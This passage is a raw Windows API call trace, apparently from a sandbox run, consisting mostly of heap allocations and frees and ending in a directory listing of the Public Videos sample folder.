RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.574] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0268.575] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.575] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.576] FreeLibrary (hLibModule=0x74d40000) returned 1 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.576] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.576] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.576] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0268.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0268.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0268.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.579] CloseHandle (hObject=0x2c8) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0268.580] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0268.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0268.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0268.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.585] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0268.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0268.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0268.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4a) returned 0x240a4d0 [0268.586] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/Sample Videos", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos", lpFilePart=0x8bedfc*="Sample Videos") returned 0x24 [0268.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0268.586] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos" (normalized: "c:\\users\\public\\videos\\sample videos")) returned 0x11 [0268.586] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName=".", cAlternateFileName="")) returned 0xaa59a0 [0268.586] FindNextFileW (in: hFindFile=0xaa59a0, 